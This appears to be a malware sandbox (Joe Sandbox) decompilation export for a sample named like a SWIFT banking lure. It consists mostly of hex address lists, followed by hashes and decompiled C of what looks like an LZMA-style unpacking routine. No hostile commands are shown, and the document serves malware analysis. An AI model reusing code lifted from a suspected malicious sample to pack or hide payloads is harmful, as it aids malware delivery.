                                                                                  0x00000000
                                                                                  0x00406df8
                                                                                  0x00406df8
                                                                                  0x00406dfc
                                                                                  0x00407569
                                                                                  0x00000000
                                                                                  0x00407569
                                                                                  0x00406e02
                                                                                  0x00406e05
                                                                                  0x00406e08
                                                                                  0x00406e0c
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e1a
                                                                                  0x00406e1d
                                                                                  0x00406e1d
                                                                                  0x00406e20
                                                                                  0x00406e23
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e29
                                                                                  0x00406e2f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e35
                                                                                  0x00406e35
                                                                                  0x00406e39
                                                                                  0x00406e3c
                                                                                  0x00406e3f
                                                                                  0x00406e42
                                                                                  0x00406e45
                                                                                  0x00406e46
                                                                                  0x00406e49
                                                                                  0x00406e4b
                                                                                  0x00406e51
                                                                                  0x00406e54
                                                                                  0x00406e57
                                                                                  0x00406e5a
                                                                                  0x00406e5d
                                                                                  0x00406e60
                                                                                  0x00406e63
                                                                                  0x00406e7f
                                                                                  0x00406e82
                                                                                  0x00406e85
                                                                                  0x00406e88
                                                                                  0x00406e8f
                                                                                  0x00406e93
                                                                                  0x00406e95
                                                                                  0x00406e99
                                                                                  0x00406e65
                                                                                  0x00406e65
                                                                                  0x00406e69
                                                                                  0x00406e71
                                                                                  0x00406e76
                                                                                  0x00406e78
                                                                                  0x00406e7a
                                                                                  0x00406e7a
                                                                                  0x00406e9c
                                                                                  0x00406ea3
                                                                                  0x00406ea6
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eb1
                                                                                  0x00406eb1
                                                                                  0x00406eb5
                                                                                  0x00407575
                                                                                  0x00000000
                                                                                  0x00407575
                                                                                  0x00406ebb
                                                                                  0x00406ebe
                                                                                  0x00406ec1
                                                                                  0x00406ec5
                                                                                  0x00406ec8
                                                                                  0x00406ece
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed3
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406edc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ede
                                                                                  0x00406ee1
                                                                                  0x00406ee4
                                                                                  0x00406ee7
                                                                                  0x00406eea
                                                                                  0x00406eed
                                                                                  0x00406ef0
                                                                                  0x00406ef3
                                                                                  0x00406ef6
                                                                                  0x00406ef9
                                                                                  0x00406efc
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f1a
                                                                                  0x00406f1d
                                                                                  0x00406f1d
                                                                                  0x00406f20
                                                                                  0x00406f24
                                                                                  0x00406f26
                                                                                  0x00406efe
                                                                                  0x00406efe
                                                                                  0x00406f06
                                                                                  0x00406f0b
                                                                                  0x00406f0d
                                                                                  0x00406f0f
                                                                                  0x00406f0f
                                                                                  0x00406f29
                                                                                  0x00406f30
                                                                                  0x00406f33
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00406f33
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f75
                                                                                  0x00406f75
                                                                                  0x00406f79
                                                                                  0x00407581
                                                                                  0x00000000
                                                                                  0x00407581
                                                                                  0x00406f7f
                                                                                  0x00406f82
                                                                                  0x00406f85
                                                                                  0x00406f89
                                                                                  0x00406f8c
                                                                                  0x00406f92
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f97
                                                                                  0x00406f9a
                                                                                  0x00406f9a
                                                                                  0x00406fa0
                                                                                  0x00406f3e
                                                                                  0x00406f3e
                                                                                  0x00406f41
                                                                                  0x00000000
                                                                                  0x00406f41
                                                                                  0x00406fa2
                                                                                  0x00406fa2
                                                                                  0x00406fa5
                                                                                  0x00406fa8
                                                                                  0x00406fab
                                                                                  0x00406fae
                                                                                  0x00406fb1
                                                                                  0x00406fb4
                                                                                  0x00406fb7
                                                                                  0x00406fba
                                                                                  0x00406fbd
                                                                                  0x00406fc0
                                                                                  0x00406fd8
                                                                                  0x00406fdb
                                                                                  0x00406fde
                                                                                  0x00406fe1
                                                                                  0x00406fe1
                                                                                  0x00406fe4
                                                                                  0x00406fe8
                                                                                  0x00406fea
                                                                                  0x00406fc2
                                                                                  0x00406fc2
                                                                                  0x00406fca
                                                                                  0x00406fcf
                                                                                  0x00406fd1
                                                                                  0x00406fd3
                                                                                  0x00406fd3
                                                                                  0x00406fed
                                                                                  0x00406ff4
                                                                                  0x00406ff7
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00407286
                                                                                  0x00407286
                                                                                  0x0040728a
                                                                                  0x004075b1
                                                                                  0x00000000
                                                                                  0x004075b1
                                                                                  0x00407290
                                                                                  0x00407293
                                                                                  0x00407296
                                                                                  0x0040729a
                                                                                  0x0040729d
                                                                                  0x004072a3
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407056
                                                                                  0x00407056
                                                                                  0x00407059
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x00407395
                                                                                  0x00407399
                                                                                  0x004073bb
                                                                                  0x004073be
                                                                                  0x004073c8
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x0040739b
                                                                                  0x0040739e
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407452
                                                                                  0x00407456
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x0040747b
                                                                                  0x00407482
                                                                                  0x00407489
                                                                                  0x00407489
                                                                                  0x00000000
                                                                                  0x00407489
                                                                                  0x00407458
                                                                                  0x0040745b
                                                                                  0x0040745e
                                                                                  0x00407461
                                                                                  0x00407468
                                                                                  0x004073ac
                                                                                  0x004073ac
                                                                                  0x004073af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407543
                                                                                  0x00407546
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040717d
                                                                                  0x0040717f
                                                                                  0x00407186
                                                                                  0x00407187
                                                                                  0x00407189
                                                                                  0x0040718c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407194
                                                                                  0x00407197
                                                                                  0x0040719a
                                                                                  0x0040719c
                                                                                  0x0040719e
                                                                                  0x0040719e
                                                                                  0x0040719f
                                                                                  0x004071a2
                                                                                  0x004071a9
                                                                                  0x004071ac
                                                                                  0x004071ba
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407490
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040749f
                                                                                  0x0040749f
                                                                                  0x004074a3
                                                                                  0x004075db
                                                                                  0x00000000
                                                                                  0x004075db
                                                                                  0x004074a9
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074b3
                                                                                  0x004074b6
                                                                                  0x004074bc
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074c1
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c7
                                                                                  0x004074c7
                                                                                  0x004074cb
                                                                                  0x0040752b
                                                                                  0x0040752e
                                                                                  0x00407533
                                                                                  0x00407534
                                                                                  0x00407536
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x0040744d
                                                                                  0x00407447
                                                                                  0x004074cd
                                                                                  0x004074d3
                                                                                  0x004074d6
                                                                                  0x004074d9
                                                                                  0x004074dc
                                                                                  0x004074df
                                                                                  0x004074e2
                                                                                  0x004074e5
                                                                                  0x004074e8
                                                                                  0x004074eb
                                                                                  0x004074ee
                                                                                  0x00407507
                                                                                  0x0040750a
                                                                                  0x0040750d
                                                                                  0x00407510
                                                                                  0x00407514
                                                                                  0x00407516
                                                                                  0x00407516
                                                                                  0x00407517
                                                                                  0x0040751a
                                                                                  0x004074f0
                                                                                  0x004074f0
                                                                                  0x004074f8
                                                                                  0x004074fd
                                                                                  0x004074ff
                                                                                  0x00407502
                                                                                  0x00407502
                                                                                  0x0040751d
                                                                                  0x00407524
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071fb
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732e
                                                                                  0x0040732e
                                                                                  0x00407331
                                                                                  0x00407333
                                                                                  0x004075bd
                                                                                  0x00000000
                                                                                  0x004075bd
                                                                                  0x00407339
                                                                                  0x0040733c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407342
                                                                                  0x00407346
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00000000
                                                                                  0x00407349
                                                                                  0x004071c7
                                                                                  0x004071c9
                                                                                  0x004071cb
                                                                                  0x004071cd
                                                                                  0x004071d0
                                                                                  0x004071d1
                                                                                  0x004071d3
                                                                                  0x004071d5
                                                                                  0x004071d8
                                                                                  0x004071db
                                                                                  0x004071f1
                                                                                  0x004071f6
                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x0040725e
                                                                                  0x00407260
                                                                                  0x00407267
                                                                                  0x0040726a
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407272
                                                                                  0x00407272
                                                                                  0x00407274
                                                                                  0x00407277
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x004072ae
                                                                                  0x004072ae
                                                                                  0x004072b1
                                                                                  0x004072b4
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00000000
                                                                                  0x00407328
                                                                                  0x004072b6
                                                                                  0x004072bc
                                                                                  0x004072bf
                                                                                  0x004072c2
                                                                                  0x004072c5
                                                                                  0x004072c8
                                                                                  0x004072cb
                                                                                  0x004072ce
                                                                                  0x004072d1
                                                                                  0x004072d4
                                                                                  0x004072d7
                                                                                  0x004072f0
                                                                                  0x004072f2
                                                                                  0x004072f5
                                                                                  0x004072f6
                                                                                  0x004072f9
                                                                                  0x004072fb
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407305
                                                                                  0x00407307
                                                                                  0x0040730a
                                                                                  0x0040730e
                                                                                  0x00407310
                                                                                  0x00407310
                                                                                  0x00407311
                                                                                  0x00407314
                                                                                  0x00407317
                                                                                  0x004072d9
                                                                                  0x004072d9
                                                                                  0x004072e1
                                                                                  0x004072e6
                                                                                  0x004072e8
                                                                                  0x004072eb
                                                                                  0x004072eb
                                                                                  0x0040731a
                                                                                  0x00407321
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00407321
                                                                                  0x00407234
                                                                                  0x00407237
                                                                                  0x00407239
                                                                                  0x0040723c
                                                                                  0x0040723f
                                                                                  0x00407242
                                                                                  0x00407244
                                                                                  0x00407247
                                                                                  0x0040724a
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407257
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00407257
                                                                                  0x004071dd
                                                                                  0x004071e0
                                                                                  0x004071e2
                                                                                  0x004071e5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f44
                                                                                  0x00406f44
                                                                                  0x00406f48
                                                                                  0x0040758d
                                                                                  0x00000000
                                                                                  0x0040758d
                                                                                  0x00406f4e
                                                                                  0x00406f51
                                                                                  0x00406f54
                                                                                  0x00406f57
                                                                                  0x00406f5a
                                                                                  0x00406f5d
                                                                                  0x00406f60
                                                                                  0x00406f62
                                                                                  0x00406f65
                                                                                  0x00406f68
                                                                                  0x00406f6b
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070cf
                                                                                  0x004070cf
                                                                                  0x004070d3
                                                                                  0x00407599
                                                                                  0x00000000
                                                                                  0x00407599
                                                                                  0x004070d9
                                                                                  0x004070dc
                                                                                  0x004070df
                                                                                  0x004070e2
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e7
                                                                                  0x004070ea
                                                                                  0x004070ed
                                                                                  0x004070f0
                                                                                  0x004070f3
                                                                                  0x004070f6
                                                                                  0x004070f7
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070fc
                                                                                  0x004070ff
                                                                                  0x00407102
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407108
                                                                                  0x0040710a
                                                                                  0x0040710a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x00407350
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407356
                                                                                  0x00407359
                                                                                  0x0040735c
                                                                                  0x0040735f
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407364
                                                                                  0x00407367
                                                                                  0x0040736a
                                                                                  0x0040736d
                                                                                  0x00407370
                                                                                  0x00407373
                                                                                  0x00407374
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737c
                                                                                  0x0040737f
                                                                                  0x00407382
                                                                                  0x00407385
                                                                                  0x00407389
                                                                                  0x0040738b
                                                                                  0x0040738e
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x0040710d
                                                                                  0x0040710d
                                                                                  0x00000000
                                                                                  0x0040710d
                                                                                  0x0040738e
                                                                                  0x004075c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x004075fa
                                                                                  0x004075fa
                                                                                  0x00000000
                                                                                  0x004075fa
                                                                                  0x00407447
                                                                                  0x004073ce
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x00407002

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                  • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                  • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                  • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E0040711C() {
                                                                                  				unsigned short _t531;
                                                                                  				signed int _t532;
                                                                                  				void _t533;
                                                                                  				signed int _t534;
                                                                                  				signed int _t535;
                                                                                  				signed int _t565;
                                                                                  				signed int _t568;
                                                                                  				signed int _t589;
                                                                                  				signed int* _t606;
                                                                                  				void* _t613;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					if( *(_t613 - 0x40) != 0) {
                                                                                  						 *(_t613 - 0x84) = 0xb;
                                                                                  						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                  						goto L132;
                                                                                  					} else {
                                                                                  						__eax =  *(__ebp - 0x28);
                                                                                  						L88:
                                                                                  						 *(__ebp - 0x2c) = __eax;
                                                                                  						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  						L89:
                                                                                  						__eax =  *(__ebp - 4);
                                                                                  						 *(__ebp - 0x80) = 0x15;
                                                                                  						__eax =  *(__ebp - 4) + 0xa68;
                                                                                  						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                  						L69:
                                                                                  						 *(__ebp - 0x84) = 0x12;
                                                                                  						while(1) {
                                                                                  							L132:
                                                                                  							 *(_t613 - 0x54) = _t606;
                                                                                  							while(1) {
                                                                                  								L133:
                                                                                  								_t531 =  *_t606;
                                                                                  								_t589 = _t531 & 0x0000ffff;
                                                                                  								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                  								if( *(_t613 - 0xc) >= _t565) {
                                                                                  									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                  									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                  									 *(_t613 - 0x40) = 1;
                                                                                  									_t532 = _t531 - (_t531 >> 5);
                                                                                  									 *_t606 = _t532;
                                                                                  								} else {
                                                                                  									 *(_t613 - 0x10) = _t565;
                                                                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                  									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                  								}
                                                                                  								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                  									goto L139;
                                                                                  								}
                                                                                  								L137:
                                                                                  								if( *(_t613 - 0x6c) == 0) {
                                                                                  									 *(_t613 - 0x88) = 5;
                                                                                  									L170:
                                                                                  									_t568 = 0x22;
                                                                                  									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                  									_t535 = 0;
                                                                                  									L172:
                                                                                  									return _t535;
                                                                                  								}
                                                                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                  								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                  								L139:
                                                                                  								_t533 =  *(_t613 - 0x84);
                                                                                  								while(1) {
                                                                                  									 *(_t613 - 0x88) = _t533;
                                                                                  									while(1) {
                                                                                  										L1:
                                                                                  										_t534 =  *(_t613 - 0x88);
                                                                                  										if(_t534 > 0x1c) {
                                                                                  											break;
                                                                                  										}
                                                                                  										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                  											case 0:
                                                                                  												if( *(_t613 - 0x6c) == 0) {
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                  												_t534 =  *( *(_t613 - 0x70));
                                                                                  												if(_t534 > 0xe1) {
                                                                                  													goto L171;
                                                                                  												}
                                                                                  												_t538 = _t534 & 0x000000ff;
                                                                                  												_push(0x2d);
                                                                                  												asm("cdq");
                                                                                  												_pop(_t570);
                                                                                  												_push(9);
                                                                                  												_pop(_t571);
                                                                                  												_t609 = _t538 / _t570;
                                                                                  												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                  												asm("cdq");
                                                                                  												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                  												 *(_t613 - 0x3c) = _t604;
                                                                                  												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                  												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                  												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                  												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                  													L10:
                                                                                  													if(_t612 == 0) {
                                                                                  														L12:
                                                                                  														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                  														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                  														goto L15;
                                                                                  													} else {
                                                                                  														goto L11;
                                                                                  													}
                                                                                  													do {
                                                                                  														L11:
                                                                                  														_t612 = _t612 - 1;
                                                                                  														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                  													} while (_t612 != 0);
                                                                                  													goto L12;
                                                                                  												}
                                                                                  												if( *(_t613 - 4) != 0) {
                                                                                  													GlobalFree( *(_t613 - 4));
                                                                                  												}
                                                                                  												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                  												 *(_t613 - 4) = _t534;
                                                                                  												if(_t534 == 0) {
                                                                                  													goto L171;
                                                                                  												} else {
                                                                                  													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                  													goto L10;
                                                                                  												}
                                                                                  											case 1:
                                                                                  												L13:
                                                                                  												__eflags =  *(_t613 - 0x6c);
                                                                                  												if( *(_t613 - 0x6c) == 0) {
                                                                                  													 *(_t613 - 0x88) = 1;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                  												_t45 = _t613 - 0x48;
                                                                                  												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                  												__eflags =  *_t45;
                                                                                  												L15:
                                                                                  												if( *(_t613 - 0x48) < 4) {
                                                                                  													goto L13;
                                                                                  												}
                                                                                  												_t546 =  *(_t613 - 0x40);
                                                                                  												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                  													L20:
                                                                                  													 *(_t613 - 0x48) = 5;
                                                                                  													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                  													goto L23;
                                                                                  												}
                                                                                  												 *(_t613 - 0x74) = _t546;
                                                                                  												if( *(_t613 - 8) != 0) {
                                                                                  													GlobalFree( *(_t613 - 8));
                                                                                  												}
                                                                                  												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                  												 *(_t613 - 8) = _t534;
                                                                                  												if(_t534 == 0) {
                                                                                  													goto L171;
                                                                                  												} else {
                                                                                  													goto L20;
                                                                                  												}
                                                                                  											case 2:
                                                                                  												L24:
                                                                                  												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                  												 *(_t613 - 0x84) = 6;
                                                                                  												 *(_t613 - 0x4c) = _t553;
                                                                                  												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                  												L132:
                                                                                  												 *(_t613 - 0x54) = _t606;
                                                                                  												goto L133;
                                                                                  											case 3:
                                                                                  												L21:
                                                                                  												__eflags =  *(_t613 - 0x6c);
                                                                                  												if( *(_t613 - 0x6c) == 0) {
                                                                                  													 *(_t613 - 0x88) = 3;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  												_t67 = _t613 - 0x70;
                                                                                  												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                  												__eflags =  *_t67;
                                                                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                  												L23:
                                                                                  												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                  												if( *(_t613 - 0x48) != 0) {
                                                                                  													goto L21;
                                                                                  												}
                                                                                  												goto L24;
                                                                                  											case 4:
                                                                                  												L133:
                                                                                  												_t531 =  *_t606;
                                                                                  												_t589 = _t531 & 0x0000ffff;
                                                                                  												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                  												if( *(_t613 - 0xc) >= _t565) {
                                                                                  													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                  													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                  													 *(_t613 - 0x40) = 1;
                                                                                  													_t532 = _t531 - (_t531 >> 5);
                                                                                  													 *_t606 = _t532;
                                                                                  												} else {
                                                                                  													 *(_t613 - 0x10) = _t565;
                                                                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                  													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                  												}
                                                                                  												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                  													goto L139;
                                                                                  												}
                                                                                  											case 5:
                                                                                  												goto L137;
                                                                                  											case 6:
                                                                                  												__edx = 0;
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													__eax =  *(__ebp - 4);
                                                                                  													__ecx =  *(__ebp - 0x38);
                                                                                  													 *(__ebp - 0x34) = 1;
                                                                                  													 *(__ebp - 0x84) = 7;
                                                                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                  													while(1) {
                                                                                  														L132:
                                                                                  														 *(_t613 - 0x54) = _t606;
                                                                                  														goto L133;
                                                                                  													}
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                  												__esi =  *(__ebp - 0x60);
                                                                                  												__cl = 8;
                                                                                  												__cl = 8 -  *(__ebp - 0x3c);
                                                                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                  												__ecx =  *(__ebp - 0x3c);
                                                                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                  												__ecx =  *(__ebp - 4);
                                                                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                  												__eflags =  *(__ebp - 0x38) - 4;
                                                                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  												if( *(__ebp - 0x38) >= 4) {
                                                                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                  													if( *(__ebp - 0x38) >= 0xa) {
                                                                                  														_t98 = __ebp - 0x38;
                                                                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                  														__eflags =  *_t98;
                                                                                  													} else {
                                                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                  													}
